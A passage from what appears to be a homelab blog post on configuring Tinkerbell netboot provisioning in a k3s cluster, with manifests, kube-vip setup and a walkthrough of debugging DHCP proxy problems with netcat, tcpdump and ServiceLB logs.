</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kernelVersion</span>: <span style="color:#e6db74">&#34;both&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingClaim</span>: <span style="color:#e6db74">&#34;hookos-volume&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubevip</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The first setting, <code>publicIP</code>, is the public IP under which Tinkerbell&rsquo;s services
will be available to other machines. It will be used in DHCP responses for the
next-server option, download URLs for iPXE scripts, and so forth. It will also be set
as the <code>loadBalancerIP</code> in the Service manifest created by the chart. In my
case, this is a VIP controlled by a kube-vip deployment I will go into more
detail on later. The <code>trustedProxies</code> entry is just the CIDR for Pods in
my k3s cluster. The <code>artifactsFileServer</code> is the address for the HookOS artifacts,
in this case the kernel and initrd. The Tinkerbell chart sets up a small Nginx
deployment for this and automatically downloads the newest HookOS artifacts to
it. This is configured under <code>optional.hookos</code>. I&rsquo;m also disabling a few things
because I don&rsquo;t intend to use them. One of those is leader elections for
Tinkerbell - as I will only have one deployment, those seem unnecessary. I disable
Rufio and SecondStar as well. Rufio is a component to talk to baseboard
management controllers usually found on enterprise equipment. As I don&rsquo;t have
any such gear, it&rsquo;s unnecessary. Finally, SecondStar is a serial over SSH service
I also don&rsquo;t need.</p>
<p>The <code>dhcpMode</code> of Smee, the DHCP and general netboot component of Tinkerbell,
is more interesting. DHCP servers, especially those providing netboot options,
sometimes need to coexist: one DHCP server does the general IP management,
handing out dynamic and static leases as well as options like NTP and DNS servers,
while a second DHCP server only sends out the DHCP information
necessary for PXE boot. Most normal DHCP servers can do that as well; for example, I&rsquo;m
currently using <a href="https://thekelleys.org.uk/dnsmasq/doc.html">Dnsmasq</a> to boot
my diskless machines, while normal IP address management is done
by the ISC DHCP server running on my OPNsense router.
Smee supports similar modes. It can either do all of the DHCP in one, handing
out IPs and netboot information, or only hand out netboot info, or not
do anything with DHCP at all and only serve iPXE binaries and scripts. The
different running modes are described in more detail <a href="https://github.com/tinkerbell/smee/blob/main/README.md#dhcp-modes">here</a>.
I&rsquo;m using the proxy mode because I&rsquo;ve already got a DHCP server handling
address management, although I might change that for the actual production
deployment. This is because I have to set the machine&rsquo;s static IP in the
Hardware manifest anyway, as I will explain later. And I just like the fact
that static IPs would then finally be under version control. Right now, they&rsquo;re
just configured in the OPNsense UI.</p>
<p>The <code>logLevel</code> option is more important than it seems. Without it, Tinkerbell
will keep a number of low priority errors/warnings to itself. These are the
kind of &ldquo;error&rdquo; which might appear during normal operation, like DHCP packets
arriving for hosts which Tinkerbell doesn&rsquo;t know about. But suppressing them made
debugging my setup quite a bit more difficult. I will talk about that in the next
section.</p>
<p>I&rsquo;m also disabling the kube-vip service that the chart can deploy, and instead
deploy a separate one to have more control over the deployment.</p>
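<p>For completeness, this is roughly how I then install the chart with that values
file. The OCI reference, version and namespace below are placeholders; the README
of the linked chart repository has the authoritative command:</p>
<pre tabindex="0"><code># chart reference, version and namespace are placeholders - check the chart README
helm upgrade --install tinkerbell oci://ghcr.io/tinkerbell/charts/tinkerbell \
  --version vX.Y.Z \
  --namespace tinkerbell --create-namespace \
  --values values.yaml
</code></pre>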
<h2 id="configuring-tinkerbell">Configuring Tinkerbell</h2>
<p>The goal of my first tests was to get a feel for how Tinkerbell ticks. So I
didn&rsquo;t start out with trying to install an OS, but just wanted to see how the
netboot and the Tinkerbell manifests work.</p>
<p>Before launching the VM, I created a couple of manifests for Tinkerbell. The
core of Tinkerbell is the Workflow. It connects a Template containing actions
to be executed with a Hardware representing a host. Here is my initial
configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">x86_64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:07:8d:0d</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">203.0.113.250</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: test-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;echome&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: ghcr.io/jacobweinstock/waitdaemon:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            pid: host
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            command:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - echo &#34;Hello, this is {{ .machine_mac }}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - echo &#34;Ending script here&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              IMAGE: alpine
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              WAIT_SECONDS: 60
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - /var/run/docker.sock:/var/run/docker.sock</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;tinkerbell.org/v1alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Workflow</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-workflow</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">templateRef</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hardwareRef</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hardwareMap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">machine_mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:07:8d:0d</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the Hardware manifest. It defines both, characteristics of the
machine as well as configuration for said machine. This controls both the DHCP
as well as the netboot options, also configuring whether the machine gets to
PXE boot and whether it gets to run workflows. The Hardware is documented in
more detail <a href="https://tinkerbell.org/docs/concepts/hardware/">here</a>. The Hardware
manifest has a lot more options, but for my tests, only these ones were
relevant.</p>
<p>Next is the Template. This specifies the actions to be executed. In this particular
example, I&rsquo;m only running a few simple <code>echo</code> command, as I was mostly interested
in how the netboot works. These Templates are not supposed to be machine-specific,
but instead are intended to be used by multiple workflows.</p>
<p>And finally, there&rsquo;s the Workflow itself. It specifies a Hardware, meaning a
host, and a Template to apply to that host.
The <code>hardwareMap</code> is a map of values to be made available in Templates; see my
use of the <code>machine_mac</code> in the Template to set the <code>worker</code> ID. One downside
of Tinkerbell at the moment is that only the <code>spec.disks</code> value from the Hardware
is available in Templates, but none of the other fields. That&rsquo;s why I had to add the
<code>machine_mac</code> to the Workflow&rsquo;s <code>hardwareMap</code>, instead of taking the value from
the <code>spec.interfaces[].dhcp</code> field.</p>
<p>To summarize what this configuration is supposed to achieve: When Tinkerbell
receives a DHCP request from a machine with the MAC address <code>10:66:6a:07:8d:0d</code>,
it will send it some netboot information, namely itself as the next server
option and an iPXE binary. That binary will fetch an iPXE script when executed
by the netbooting host, again from Tinkerbell. That script will then download
the kernel and initrd for the HookOS from Tinkerbell&rsquo;s Nginx deployment. When
those are booted up, they will launch the Tink worker in Docker and request
a workflow from Tinkerbell. It will get the <code>echome</code> action delivered and execute
that. Right now, that only runs a couple of echo commands.</p>
<p>But that did not work out as expected, at least initially.</p>
<h2 id="dhcp-problems">DHCP problems</h2>
<p>For my testing, I needed another VM. And it couldn&rsquo;t have a normal image,
because I wanted to ultimately install a fresh OS on it. Luckily, Incus supports
the <code>--empty</code> parameter to create a VM and root disk, but without setting up an
image. I launched my test VM like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>incus init test-vm --empty --vm -c limits.cpu<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span> -c limits.memory<span style="color:#f92672">=</span>4GiB --profile base --profile disk-vms -d network,hwaddr<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;10:66:6a:07:8d:0d&#34;</span>
</span></span></code></pre></div><p>This command creates a VM with an empty 20 GB root disk. The VM also gets
4 GiB of RAM and 4 CPU cores. I&rsquo;m also hardcoding the MAC address of the
NIC. This was a later addition: I deleted the VM multiple times during
testing, and having it get a new MAC on every recreation got annoying because
I had to change the static DHCP lease and Tinkerbell config each time.</p>
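<p>To watch what the VM does during netboot, starting it with the console attached
is handy. Something along these lines should work, though the exact flag may
differ between Incus versions:</p>
<pre tabindex="0"><code># start the VM and attach to its console to watch the PXE attempt
incus start test-vm --console
</code></pre>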
<p>Then I launched the VM and saw - nothing. It tried to PXE boot, but did not get
any netboot info, so it dropped into a UEFI shell. I looked over my configuration,
but couldn&rsquo;t find anything wrong. So I ran a quick test to see whether packets sent to port 67
even made it into the Tinkerbell Pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;foo&#34;</span> | nc -u 203.0.113.200 <span style="color:#ae81ff">67</span>
</span></span></code></pre></div><p>And indeed, the packet seemed to reach Tinkerbell, as I saw this in the logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-01T20:48:36.172709819Z&#34;</span>,<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/dhcp/server/dhcp.go:62&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;error parsing DHCPv4 request&#34;</span>,<span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,<span style="color:#f92672">&#34;err&#34;</span>:<span style="color:#e6db74">&#34;buffer too short at position 4: have 0 bytes, want 4 bytes&#34;</span>}
</span></span></code></pre></div><p>I wasn&rsquo;t sending a DHCP message, so it was understandable that Tinkerbell didn&rsquo;t
know what to do with it. So in principle, the ServiceLB of k3s was working. But
the DHCP packets did not. Next, I ran tcpdump on the VM running Tinkerbell to
see whether the DHCP packets even made it to the machine itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tcpdump: verbose output suppressed, use -v<span style="color:#f92672">[</span>v<span style="color:#f92672">]</span>... <span style="color:#66d9ef">for</span> full protocol decode
</span></span><span style="display:flex;"><span>listening on enp5s0, link-type EN10MB <span style="color:#f92672">(</span>Ethernet<span style="color:#f92672">)</span>, snapshot length <span style="color:#ae81ff">262144</span> bytes
</span></span><span style="display:flex;"><span>23:02:42.984176 IP 0.0.0.0.bootpc &gt; 255.255.255.255.bootps: BOOTP/DHCP, Request from 10:66:6a:07:8d:0d <span style="color:#f92672">(</span>oui Unknown<span style="color:#f92672">)</span>, length <span style="color:#ae81ff">253</span>
</span></span><span style="display:flex;"><span>E...V...@.#..........D.C...4.....3.......................fj...................................................................................................................................................................................
</span></span><span style="display:flex;"><span>..........................c.Sc5..9...7.....
</span></span><span style="display:flex;"><span>23:02:42.984524 IP _gateway.bootps &gt; 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>E..H.......B
</span></span><span style="display:flex;"><span>V.......C.D.4.......3..........
</span></span><span style="display:flex;"><span>V...........fj.............................................................................................................................................................................................................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..3....T........
</span></span><span style="display:flex;"><span>V....
</span></span><span style="display:flex;"><span>V.............................
</span></span><span style="display:flex;"><span>23:02:46.363155 IP 0.0.0.0.bootpc &gt; 255.255.255.255.bootps: BOOTP/DHCP, Request from 10:66:6a:07:8d:0d <span style="color:#f92672">(</span>oui Unknown<span style="color:#f92672">)</span>, length <span style="color:#ae81ff">265</span>
</span></span><span style="display:flex;"><span>E..%V...@.#..........D.C...l.....3.......................fj...................................................................................................................................................................................
</span></span><span style="display:flex;"><span>..........................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..2.
</span></span><span style="display:flex;"><span>V..9...7.....
</span></span><span style="display:flex;"><span>23:02:46.363507 IP _gateway.bootps &gt; 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>E..H.......B
</span></span><span style="display:flex;"><span>V.......C.D.4.......3..........
</span></span><span style="display:flex;"><span>V...........fj.............................................................................................................................................................................................................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..3....P........
</span></span><span style="display:flex;"><span>V....
</span></span><span style="display:flex;"><span>V.............................
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">4</span> packets captured
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">4</span> packets received by filter
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">0</span> packets dropped by kernel
</span></span></code></pre></div><p>So yes, the packet at least arrived at the machine and on the right interface.
Running tcpdump in the network namespace of the Tinkerbell Pod showed no packet
arriving, though. So I dug a bit deeper into k3s&rsquo; ServiceLB and what it actually
does, and found this output in the logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kmaster logs -n kube-system svclb-tinkerbell-01c2218a-p69fs -c lb-udp-67
</span></span><span style="display:flex;"><span>+ trap exit TERM INT
</span></span><span style="display:flex;"><span>+ BIN_DIR<span style="color:#f92672">=</span>/usr/sbin
</span></span><span style="display:flex;"><span>+ check_iptables_mode
</span></span><span style="display:flex;"><span>+ set +e
</span></span><span style="display:flex;"><span>+ lsmod
</span></span><span style="display:flex;"><span>+ grep -qF nf_tables
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;=&#39;</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ mode<span style="color:#f92672">=</span>nft
</span></span><span style="display:flex;"><span>+ set -e
</span></span><span style="display:flex;"><span>+ info <span style="color:#e6db74">&#39;nft mode detected&#39;</span>
</span></span><span style="display:flex;"><span>+ set_nft
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>INFO<span style="color:#f92672">]</span>  nft mode detected
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables-save
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables-restore
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/ip6tables
</span></span><span style="display:flex;"><span>+ start_proxy
</span></span><span style="display:flex;"><span>+ echo 0.0.0.0/0
</span></span><span style="display:flex;"><span>+ grep -Eq :
</span></span><span style="display:flex;"><span>+ iptables -t filter -I FORWARD -s 0.0.0.0/0 -p UDP --dport <span style="color:#ae81ff">32562</span> -j ACCEPT
</span></span><span style="display:flex;"><span>+ echo 203.0.113.200
</span></span><span style="display:flex;"><span>+ grep -Eq :
</span></span><span style="display:flex;"><span>+ cat /proc/sys/net/ipv4/ip_forward
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#ae81ff">1</span> <span style="color:#e6db74">&#39;==&#39;</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ iptables -t filter -A FORWARD -d 203.0.113.200/32 -p UDP --dport <span style="color:#ae81ff">32562</span> -j DROP
</span></span><span style="display:flex;"><span>+ iptables -t nat -I PREROUTING -p UDP --dport <span style="color:#ae81ff">67</span> -j DNAT --to 203.0.113.200:32562
</span></span><span style="display:flex;"><span>+ iptables -t nat -I POSTROUTING -d 203.0.113.200/32 -p UDP -j MASQUERADE
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#e6db74">&#39;!&#39;</span> -e /pause <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ mkfifo /pause
</span></span></code></pre></div><p>What I <em>thought</em> I could read out of that setup was that only packets
directed to the exact IP of the host, <code>203.0.113.200</code>, would be forwarded to
the Tinkerbell Pod. But the initial DHCP discovery packets are of course sent
to the broadcast address, as can be seen in the tcpdump above. And so I
assumed that these packets would simply get dropped, because they were not
addressed to the unicast address of the host. But I&rsquo;m no longer 100% sure about
that, because in later testing, with kube-vip as the LoadBalancer instead of
ServiceLB, I got a similar result - no reaction from Tinkerbell in the logs. But:
I then figured out that I had the log level too low.</p>
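<p>If you want to double-check what the svclb Pod actually programmed, dumping the
NAT table from inside that Pod works. The Pod and container names below are just
the ones from my logs above; yours will differ:</p>
<pre tabindex="0"><code># dump the DNAT/MASQUERADE rules the klipper-lb container set up
kubectl -n kube-system exec svclb-tinkerbell-01c2218a-p69fs -c lb-udp-67 -- \
  iptables -t nat -L -n -v
</code></pre>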
<p>But at this point, I still thought that ServiceLB was the problem. So I decided
to disable it and instead deploy <a href="https://kube-vip.io/">kube-vip</a>. I&rsquo;ve already
got experience with it, as I&rsquo;m using it as the VIP provider for the k8s API in
my main cluster.</p>
<p>I deployed kube-vip with this Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">DaemonSet</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/kube-vip/kube-vip:v0.9.1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">IfNotPresent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">manager</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_enable</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_arp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaderelection</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_election</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">NET_ADMIN</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">NET_RAW</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">SYS_TIME</span>
</span></span></code></pre></div><p>With this config, kube-vip will watch for LoadBalancer services and announce
their IP via ARP. I&rsquo;ve disabled all leader elections, as this k3s cluster
will only ever have a single node.
Kube-vip does not have any IPAM functionality; it relies either on annotations
on the Service or the <code>loadBalancerIP</code> setting. The Tinkerbell chart already
sets the <code>loadBalancerIP</code> to the <code>publicIP</code> value from the <code>values.yaml</code> file,
so I just relied on that.</p>
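<p>To illustrate what kube-vip reacts to, this is roughly the shape of Service the
chart renders for Tinkerbell - a simplified sketch with illustrative names and a
trimmed-down port list, not the actual manifest:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Service
metadata:
  name: tinkerbell              # illustrative name
spec:
  type: LoadBalancer
  loadBalancerIP: 203.0.113.200 # filled in from the publicIP chart value
  ports:
    - name: dhcp
      port: 67
      protocol: UDP
</code></pre>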
<p>But that did not seem to fix my problem. There still wasn&rsquo;t any reaction from
Tinkerbell to the DHCP requests. That was when I finally realized that I had
never increased Tinkerbell&rsquo;s log level. &#x1f926;
And that was when I finally got some results:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-07T22:04:38.322503545Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;-1&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/dhcp/handler/proxy/proxy.go:211&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Ignoring packet&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;mac&#34;</span>:<span style="color:#e6db74">&#34;10:66:6a:07:8d:0d&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;xid&#34;</span>:<span style="color:#e6db74">&#34;0xfd39e0af&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;interface&#34;</span>:<span style="color:#e6db74">&#34;macvlan0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#e6db74">&#34;failed to convert hardware to DHCP data: no IP data&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I didn&rsquo;t have time to dig deeper into that error at the time, but did create
<a href="https://github.com/tinkerbell/tinkerbell/issues/197">this issue</a>, requesting
that the above error message be increased in log level, so it appears with the
standard logging setting. But it turned out that I had actually run into a bug.
My Hardware manifest was okay, but Tinkerbell erroneously required some IP
configuration. This has now been fixed.</p>
<h2 id="first-successful-boot">First successful boot</h2>
<p>And with that fix, I finally got my first successful netboot:
<figure>
    <img loading="lazy" src="first-hookos-boot.png"
         alt="A screenshot of a Linux terminal. It shows the command prompt after a fresh boot. The initial text welcomes the user to HookOS, Tinkerbell&#39;s boot in-memory OS. The output also indicates that the OS is based on LinuxKit and the 5.10 kernel. Furthermore, it informs the user that the &#39;docker&#39; command can be used to access tink&#39;s worker container."/> <figcaption>
            <p>Screenshot of my first successful HookOS network boot.</p>
        </figcaption>
</figure>
</p>
<p>So that was pretty nice to see. But there was something even better going on in
the background. First of all, the two <code>echo</code> commands I had configured to be run
as tasks upon boot did run. But the cool thing was how I was able to verify that.
It turns out that Tinkerbell launches a syslog server and configures the in-memory
HookOS in such a way that it forwards its logs to Tinkerbell. And Tinkerbell
then spits them out in its own logs. This is a really nice and convenient feature
for seeing what&rsquo;s happening on the remote machine.</p>
<h2 id="side-quest-generating-an-ubuntu-image">Side Quest: Generating an Ubuntu image</h2>
<p>The obvious next step was to install an entire OS instead of just outputting some
text. But for that, I first needed a new image. My current image pipeline produces
individual images for each host, which is clumsy and should be unnecessary.
Something like cloud-init should be able to do all of the initial setup I need
to prepare for Ansible management. I did not want to just use Ubuntu&rsquo;s cloud
images, though; instead, I wanted to create my own.</p>
<p>Initially, I looked at <a href="https://github.com/canonical/ubuntu-image">ubuntu-image</a>.
That&rsquo;s the tool that&rsquo;s used by Canonical to produce the official Ubuntu images.
But it went a bit too deep for me, and I wasn&rsquo;t able to really grok how it worked.
In addition, while the current image was for an x86 VM with a local disk, I would
also need images for Raspberry Pis without any local storage. And those would
definitely need some adaptations, as they need a special initramfs. It didn&rsquo;t look
like that would be easily possible with ubuntu-image, so I would have to use
Packer/Ansible for those. In the end, I would have different tools for different
images, which I didn&rsquo;t really like.</p>
